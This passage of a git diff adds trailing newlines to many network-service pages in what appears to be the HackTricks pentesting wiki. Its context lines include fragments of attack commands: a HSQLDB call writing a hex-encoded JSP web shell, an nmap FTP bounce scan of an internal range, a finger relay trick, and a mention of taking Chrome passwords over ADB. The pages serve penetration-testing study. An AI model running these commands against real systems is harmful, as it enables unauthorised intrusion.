url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md b/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md index 2a155aa06..01e52d647 100644 --- a/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md +++ b/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md @@ -30,3 +30,4 @@ For individuals interested in further exploring the realm of **printer hacking** - `port 515` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md b/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md index 298210a37..7ef693a2b 100644 --- a/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md +++ b/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md @@ -67,3 +67,4 @@ For more information check: - [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://books.google.co.uk/books/about/Practical_IoT_Hacking.html?id=GbYEEAAAQBAJ&redir_esc=y) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/5439-pentesting-redshift.md b/src/network-services-pentesting/5439-pentesting-redshift.md index 1842fcfef..f4297acbe 100644 --- a/src/network-services-pentesting/5439-pentesting-redshift.md +++ b/src/network-services-pentesting/5439-pentesting-redshift.md @@ -11,3 +11,4 @@ For more information check: {% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-databases/aws-redshift-enum" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/554-8554-pentesting-rtsp.md b/src/network-services-pentesting/554-8554-pentesting-rtsp.md index 9cfa27ab5..fe60899ad 100644 --- a/src/network-services-pentesting/554-8554-pentesting-rtsp.md +++ b/src/network-services-pentesting/554-8554-pentesting-rtsp.md @@ -80,3 +80,4 @@ To bruteforce: [https://github.com/Tek-Security-Group/rtsp_authgrinder](https:// - [https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/5555-android-debug-bridge.md b/src/network-services-pentesting/5555-android-debug-bridge.md index 79dd43839..a8e1f622d 100644 --- a/src/network-services-pentesting/5555-android-debug-bridge.md +++ b/src/network-services-pentesting/5555-android-debug-bridge.md @@ -49,3 +49,4 @@ You can use this trick to **retrieve sensitive information like chrome passwords - `android debug bridge` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/5601-pentesting-kibana.md b/src/network-services-pentesting/5601-pentesting-kibana.md index 8c430a6a5..ffdaf7408 100644 --- a/src/network-services-pentesting/5601-pentesting-kibana.md +++ b/src/network-services-pentesting/5601-pentesting-kibana.md @@ -25,3 +25,4 @@ In instances where SSL/TLS is not enabled, the potential for leaking sensitive i - [https://insinuator.net/2021/01/pentesting-the-elk-stack/](https://insinuator.net/2021/01/pentesting-the-elk-stack/) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/5671-5672-pentesting-amqp.md b/src/network-services-pentesting/5671-5672-pentesting-amqp.md index bd3612d87..55146fefa 100644 --- a/src/network-services-pentesting/5671-5672-pentesting-amqp.md +++ b/src/network-services-pentesting/5671-5672-pentesting-amqp.md @@ -77,3 +77,4 @@ In [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networkin - `AMQP` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/584-pentesting-afp.md b/src/network-services-pentesting/584-pentesting-afp.md index 512930796..3446f4016 100644 --- a/src/network-services-pentesting/584-pentesting-afp.md +++ b/src/network-services-pentesting/584-pentesting-afp.md @@ -32,3 +32,4 @@ nmap -sV --script "afp-* and not dos and not brute" -p ### [**Brute Force**](../generic-hacking/brute-force.md#afp) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/5984-pentesting-couchdb.md b/src/network-services-pentesting/5984-pentesting-couchdb.md index df2b2e2b9..1b8ed7f0a 100644 --- a/src/network-services-pentesting/5984-pentesting-couchdb.md +++ b/src/network-services-pentesting/5984-pentesting-couchdb.md @@ -264,3 +264,4 @@ A [**summary**](https://github.com/carlospolop/hacktricks/pull/116/commits/e505c - [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/5985-5986-pentesting-omi.md b/src/network-services-pentesting/5985-5986-pentesting-omi.md index c1cd5942f..d630e7018 100644 --- a/src/network-services-pentesting/5985-5986-pentesting-omi.md +++ b/src/network-services-pentesting/5985-5986-pentesting-omi.md @@ -43,3 +43,4 @@ For a more information about this CVE **[check this](https://github.com/horizon3 - [https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/](https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/5985-5986-pentesting-winrm.md b/src/network-services-pentesting/5985-5986-pentesting-winrm.md index eec8262d8..fb412fefe 100644 --- a/src/network-services-pentesting/5985-5986-pentesting-winrm.md +++ b/src/network-services-pentesting/5985-5986-pentesting-winrm.md @@ -347,3 +347,4 @@ Stay informed with the newest bug bounties launching and crucial platform update **Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/6000-pentesting-x11.md b/src/network-services-pentesting/6000-pentesting-x11.md index 9b6e63257..7274ae741 100644 --- a/src/network-services-pentesting/6000-pentesting-x11.md +++ b/src/network-services-pentesting/6000-pentesting-x11.md @@ -191,3 +191,4 @@ Stay informed with the newest bug bounties launching and crucial platform update **Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/623-udp-ipmi.md b/src/network-services-pentesting/623-udp-ipmi.md index 1d37faff5..3bb4b57ff 100644 --- a/src/network-services-pentesting/623-udp-ipmi.md +++ b/src/network-services-pentesting/623-udp-ipmi.md @@ -149,3 +149,4 @@ Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and {% embed url="https://academy.8ksec.io/" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/6379-pentesting-redis.md b/src/network-services-pentesting/6379-pentesting-redis.md index b35f05ce0..20b43c21a 100644 --- a/src/network-services-pentesting/6379-pentesting-redis.md +++ b/src/network-services-pentesting/6379-pentesting-redis.md @@ -350,3 +350,4 @@ Stay informed with the newest bug bounties launching and crucial platform update **Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/69-udp-tftp.md b/src/network-services-pentesting/69-udp-tftp.md index 67901f39c..ae4936c90 100644 --- a/src/network-services-pentesting/69-udp-tftp.md +++ b/src/network-services-pentesting/69-udp-tftp.md @@ -49,3 +49,4 @@ client.upload("filename to upload", "/local/path/file", timeout=5) {% embed url="https://websec.nl/" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md b/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md index bea420fdd..72c039699 100644 --- a/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md +++ b/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md @@ -33,3 +33,4 @@ Hello echo #This is the response [CA-1996-01 UDP Port Denial-of-Service Attack](http://www.cert.org/advisories/CA-1996-01.html) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/700-pentesting-epp.md b/src/network-services-pentesting/700-pentesting-epp.md index 400d4a489..559936292 100644 --- a/src/network-services-pentesting/700-pentesting-epp.md +++ b/src/network-services-pentesting/700-pentesting-epp.md @@ -13,3 +13,4 @@ Basically, it's one of the protocols a **TLD registrar is going to be offering t [**In this very interesting article**](https://hackcompute.com/hacking-epp-servers/) you can see how some security researches found several **implementation of this protocol** were vulnerable to XXE (XML External Entity) as this protocol uses XML to communicate, which would have allowed attackers to takeover tens of different TLDs. {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/src/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md index 333f4a6fa..0dee69181 100644 --- a/src/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md +++ b/src/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md @@ -127,3 +127,4 @@ Stay informed with the newest bug bounties launching and crucial platform update **Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/8086-pentesting-influxdb.md b/src/network-services-pentesting/8086-pentesting-influxdb.md index 2377f3f69..6638d1ecb 100644 --- a/src/network-services-pentesting/8086-pentesting-influxdb.md +++ b/src/network-services-pentesting/8086-pentesting-influxdb.md @@ -135,3 +135,4 @@ Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&u Get Access Today: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=8086-pentesting-influxdb" %} + diff --git a/src/network-services-pentesting/8089-splunkd.md b/src/network-services-pentesting/8089-splunkd.md index 973d41d0c..7357adb20 100644 --- a/src/network-services-pentesting/8089-splunkd.md +++ b/src/network-services-pentesting/8089-splunkd.md @@ -122,3 +122,4 @@ In the following page you can find an explanation how this service can be abused - [https://academy.hackthebox.com/module/113/section/1213](https://academy.hackthebox.com/module/113/section/1213) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md b/src/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md index 81e6ba895..4f99ac2b7 100644 --- a/src/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md +++ b/src/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md @@ -49,3 +49,4 @@ PORT STATE SERVICE ``` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/873-pentesting-rsync.md b/src/network-services-pentesting/873-pentesting-rsync.md index da01eb4a2..65ce23394 100644 --- a/src/network-services-pentesting/873-pentesting-rsync.md +++ b/src/network-services-pentesting/873-pentesting-rsync.md @@ -99,3 +99,4 @@ Within this file, a _secrets file_ parameter might point to a file containing ** - [https://www.smeegesec.com/2016/12/pentesting-rsync.html](https://www.smeegesec.com/2016/12/pentesting-rsync.html) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/9000-pentesting-fastcgi.md b/src/network-services-pentesting/9000-pentesting-fastcgi.md index b1f014782..2ef3cbcbe 100644 --- a/src/network-services-pentesting/9000-pentesting-fastcgi.md +++ b/src/network-services-pentesting/9000-pentesting-fastcgi.md @@ -37,3 +37,4 @@ done or you can also use the following python script: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/9001-pentesting-hsqldb.md b/src/network-services-pentesting/9001-pentesting-hsqldb.md index 1a02809b4..d8b68f466 100644 --- a/src/network-services-pentesting/9001-pentesting-hsqldb.md +++ b/src/network-services-pentesting/9001-pentesting-hsqldb.md @@ -79,3 +79,4 @@ call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d ``` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/9100-pjl.md b/src/network-services-pentesting/9100-pjl.md index 452fa451b..e9e7039e6 100644 --- a/src/network-services-pentesting/9100-pjl.md +++ b/src/network-services-pentesting/9100-pjl.md @@ -61,3 +61,4 @@ This is the tool you want to use to abuse printers: - `pjl port:9100` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/9200-pentesting-elasticsearch.md b/src/network-services-pentesting/9200-pentesting-elasticsearch.md index 3fa25291f..35902792c 100644 --- a/src/network-services-pentesting/9200-pentesting-elasticsearch.md +++ b/src/network-services-pentesting/9200-pentesting-elasticsearch.md @@ -198,3 +198,4 @@ msf > use auxiliary/scanner/elasticsearch/indices_enum {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/cassandra.md b/src/network-services-pentesting/cassandra.md index 5862bb011..8b41f9358 100644 --- a/src/network-services-pentesting/cassandra.md +++ b/src/network-services-pentesting/cassandra.md @@ -51,3 +51,4 @@ nmap -sV --script cassandra-info -p `port:9042 "Invalid or unsupported protocol version"` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md b/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md index ffb6f44ab..1aab30a2f 100644 --- a/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md +++ b/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md @@ -269,3 +269,4 @@ Ensure that actual, secure values are used to replace the placeholders when conf - `port:500 IKE` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/nfs-service-pentesting.md b/src/network-services-pentesting/nfs-service-pentesting.md index 00533bb51..2274f687d 100644 --- a/src/network-services-pentesting/nfs-service-pentesting.md +++ b/src/network-services-pentesting/nfs-service-pentesting.md @@ -128,3 +128,4 @@ Entry_2: ``` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md b/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md index 2af7ac2b5..fd20fc260 100644 --- a/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md +++ b/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md @@ -41,3 +41,4 @@ CN=Panama,O=MGMTT.srv.rxfrmi - [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html\#check-point-firewall-1-topology-port-264](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html#check-point-firewall-1-topology-port-264) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md b/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md index f7cbd646c..7d2a08293 100644 --- a/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md +++ b/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md @@ -23,3 +23,4 @@ print(response.status_code) If you want to learn more about [**hacking printers read this page**](http://hacking-printers.net/wiki/index.php/Main_Page). {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md index 4dd679ff2..723701ef3 100644 --- a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md +++ b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md @@ -19,3 +19,4 @@ jboss-service.xml ``` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-dns.md b/src/network-services-pentesting/pentesting-dns.md index f659198a1..e600578ac 100644 --- a/src/network-services-pentesting/pentesting-dns.md +++ b/src/network-services-pentesting/pentesting-dns.md @@ -286,3 +286,4 @@ Entry_6: {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-finger.md b/src/network-services-pentesting/pentesting-finger.md index f8a71ada7..275b18bd1 100644 --- a/src/network-services-pentesting/pentesting-finger.md +++ b/src/network-services-pentesting/pentesting-finger.md @@ -83,3 +83,4 @@ finger @internal@external {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-ftp/README.md b/src/network-services-pentesting/pentesting-ftp/README.md index a2de0d16a..3d9ee4002 100644 --- a/src/network-services-pentesting/pentesting-ftp/README.md +++ b/src/network-services-pentesting/pentesting-ftp/README.md @@ -280,3 +280,4 @@ Entry_7: ``` {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md b/src/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md index 538d2821d..b273ba48d 100644 --- a/src/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md +++ b/src/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md @@ -36,3 +36,4 @@ nmap -v -p 21,22,445,80,443 -b ftp:ftp@10.2.1.5 192.168.0.1/24 #Scan the interna ``` {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md b/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md index 6bfa7ae92..54fa3faa1 100644 --- a/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md +++ b/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md @@ -40,3 +40,4 @@ For a more detailed information check the post: [http://www.ouah.org/ftpbounce.h {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-imap.md b/src/network-services-pentesting/pentesting-imap.md index 667f4edba..0ee4a25b5 100644 --- a/src/network-services-pentesting/pentesting-imap.md +++ b/src/network-services-pentesting/pentesting-imap.md @@ -193,3 +193,4 @@ Entry_4: ``` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-irc.md b/src/network-services-pentesting/pentesting-irc.md index 0cd90a605..ed454a399 100644 --- a/src/network-services-pentesting/pentesting-irc.md +++ b/src/network-services-pentesting/pentesting-irc.md @@ -82,3 +82,4 @@ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,66 - `looking up your hostname` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md b/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md index d7624020a..8d82b913d 100644 --- a/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md +++ b/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md @@ -81,3 +81,4 @@ I found that the use of `--break-on 'java.lang.String.indexOf'` makes the exploi {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-kerberos-88/README.md b/src/network-services-pentesting/pentesting-kerberos-88/README.md index 6648fddcd..ba17f7a3e 100644 --- a/src/network-services-pentesting/pentesting-kerberos-88/README.md +++ b/src/network-services-pentesting/pentesting-kerberos-88/README.md @@ -66,3 +66,4 @@ Entry_4: ``` {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md b/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md index 6c35fc5c4..b2035d3db 100644 --- a/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md +++ b/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md @@ -21,3 +21,4 @@ Building on the principles of the **hercules.sh script**, the [**tickey**](https - [**https://www.tarlogic.com/en/blog/how-to-attack-kerberos/**](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md b/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md index b14ca358f..b95681e42 100644 --- a/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md +++ b/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md @@ -43,3 +43,4 @@ When using these commands, ensure to replace placeholders like `` - [https://www.tarlogic.com/en/blog/how-to-attack-kerberos/](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-ldap.md b/src/network-services-pentesting/pentesting-ldap.md index f110ab74d..a6bec8238 100644 --- a/src/network-services-pentesting/pentesting-ldap.md +++ b/src/network-services-pentesting/pentesting-ldap.md @@ -425,3 +425,4 @@ Entry_6: ``` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-modbus.md b/src/network-services-pentesting/pentesting-modbus.md index 6d025ad21..af72b72cd 100644 --- a/src/network-services-pentesting/pentesting-modbus.md +++ b/src/network-services-pentesting/pentesting-modbus.md @@ -28,3 +28,4 @@ msf> use auxiliary/scanner/scada/modbus_findunitid ``` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index a4308c0ab..cb656abfa 100644 --- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -689,3 +689,4 @@ Entry_3: ``` {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md index f5b06ba52..83811c9cb 100644 --- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md +++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md @@ -23,3 +23,4 @@ Table taken from the [**docs**](https://learn.microsoft.com/en-us/sql/relational | **allow_encrypted_value_modifications** | **bit** |

Applies to: SQL Server 2016 (13.x) and later, SQL Database.

Suppresses cryptographic metadata checks on the server in bulk copy operations. This enables the user to bulk copy data encrypted using Always Encrypted, between tables or databases, without decrypting the data. The default is OFF.

| {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-mysql.md b/src/network-services-pentesting/pentesting-mysql.md index 1b6a8c960..30dde2f77 100644 --- a/src/network-services-pentesting/pentesting-mysql.md +++ b/src/network-services-pentesting/pentesting-mysql.md @@ -662,3 +662,4 @@ Entry_4: {% embed url="https://www.rootedcon.com/" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-ntp.md b/src/network-services-pentesting/pentesting-ntp.md index 57d415248..fc898a33c 100644 --- a/src/network-services-pentesting/pentesting-ntp.md +++ b/src/network-services-pentesting/pentesting-ntp.md @@ -112,3 +112,4 @@ Stay informed with the newest bug bounties launching and crucial platform update **Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-pop.md b/src/network-services-pentesting/pentesting-pop.md index ce4cad997..32f4ad466 100644 --- a/src/network-services-pentesting/pentesting-pop.md +++ b/src/network-services-pentesting/pentesting-pop.md @@ -129,3 +129,4 @@ Entry_6: ``` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-postgresql.md b/src/network-services-pentesting/pentesting-postgresql.md index f458f13b4..52490615b 100644 --- a/src/network-services-pentesting/pentesting-postgresql.md +++ b/src/network-services-pentesting/pentesting-postgresql.md @@ -823,3 +823,4 @@ Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&u Get Access Today: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pentesting-postgresql" %} + diff --git a/src/network-services-pentesting/pentesting-rdp.md b/src/network-services-pentesting/pentesting-rdp.md index 07803d48c..423199aea 100644 --- a/src/network-services-pentesting/pentesting-rdp.md +++ b/src/network-services-pentesting/pentesting-rdp.md @@ -167,3 +167,4 @@ Entry_2: {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-remote-gdbserver.md b/src/network-services-pentesting/pentesting-remote-gdbserver.md index 525aa124a..ceedd83f3 100644 --- a/src/network-services-pentesting/pentesting-remote-gdbserver.md +++ b/src/network-services-pentesting/pentesting-remote-gdbserver.md @@ -196,3 +196,4 @@ RemoteCmd() {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-rlogin.md b/src/network-services-pentesting/pentesting-rlogin.md index 8b13815ac..dfd2ca17a 100644 --- a/src/network-services-pentesting/pentesting-rlogin.md +++ b/src/network-services-pentesting/pentesting-rlogin.md @@ -43,3 +43,4 @@ find / -name .rhosts {% embed url="https://websec.nl/" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-rpcbind.md b/src/network-services-pentesting/pentesting-rpcbind.md index b5301e14e..942f12848 100644 --- a/src/network-services-pentesting/pentesting-rpcbind.md +++ b/src/network-services-pentesting/pentesting-rpcbind.md @@ -119,3 +119,4 @@ Entry_3: ``` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-rsh.md b/src/network-services-pentesting/pentesting-rsh.md index 972e15ac0..a01b75375 100644 --- a/src/network-services-pentesting/pentesting-rsh.md +++ b/src/network-services-pentesting/pentesting-rsh.md @@ -32,3 +32,4 @@ rsh domain\\user@ - [https://www.ssh.com/ssh/rsh](https://www.ssh.com/ssh/rsh) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-sap.md b/src/network-services-pentesting/pentesting-sap.md index 9292d728d..c6d2f0f53 100644 --- a/src/network-services-pentesting/pentesting-sap.md +++ b/src/network-services-pentesting/pentesting-sap.md @@ -391,3 +391,4 @@ bizploit> start {% embed url="https://websec.nl/" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-smb.md b/src/network-services-pentesting/pentesting-smb.md index 38ce73a63..da8ab7076 100644 --- a/src/network-services-pentesting/pentesting-smb.md +++ b/src/network-services-pentesting/pentesting-smb.md @@ -590,3 +590,4 @@ Entry_6: ``` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-smb/README.md b/src/network-services-pentesting/pentesting-smb/README.md index 00259d520..8d8ee9a4e 100644 --- a/src/network-services-pentesting/pentesting-smb/README.md +++ b/src/network-services-pentesting/pentesting-smb/README.md @@ -590,3 +590,4 @@ Entry_6: ``` {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md b/src/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md index 68d6461df..f3ed8f746 100644 --- a/src/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md +++ b/src/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md @@ -97,3 +97,4 @@ Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and {% embed url="https://academy.8ksec.io/" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-smtp/README.md b/src/network-services-pentesting/pentesting-smtp/README.md index 0a70eac16..74e8a833d 100644 --- a/src/network-services-pentesting/pentesting-smtp/README.md +++ b/src/network-services-pentesting/pentesting-smtp/README.md @@ -628,3 +628,4 @@ Entry_8: {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-smtp/smtp-commands.md b/src/network-services-pentesting/pentesting-smtp/smtp-commands.md index 33f533a7b..15f96dcb7 100644 --- a/src/network-services-pentesting/pentesting-smtp/smtp-commands.md +++ b/src/network-services-pentesting/pentesting-smtp/smtp-commands.md @@ -60,3 +60,4 @@ It terminates the SMTP conversation. {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-smtp/smtp-smuggling.md b/src/network-services-pentesting/pentesting-smtp/smtp-smuggling.md index e265752e0..7fd9e20f8 100644 --- a/src/network-services-pentesting/pentesting-smtp/smtp-smuggling.md +++ b/src/network-services-pentesting/pentesting-smtp/smtp-smuggling.md @@ -33,3 +33,4 @@ Also note that the SPF is bypassed because if you smuggle an email from `admin@o - [https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/](https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-snmp/README.md b/src/network-services-pentesting/pentesting-snmp/README.md index 8303b34a9..a0e01ccf6 100644 --- a/src/network-services-pentesting/pentesting-snmp/README.md +++ b/src/network-services-pentesting/pentesting-snmp/README.md @@ -292,3 +292,4 @@ Entry_5: ``` {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md b/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md 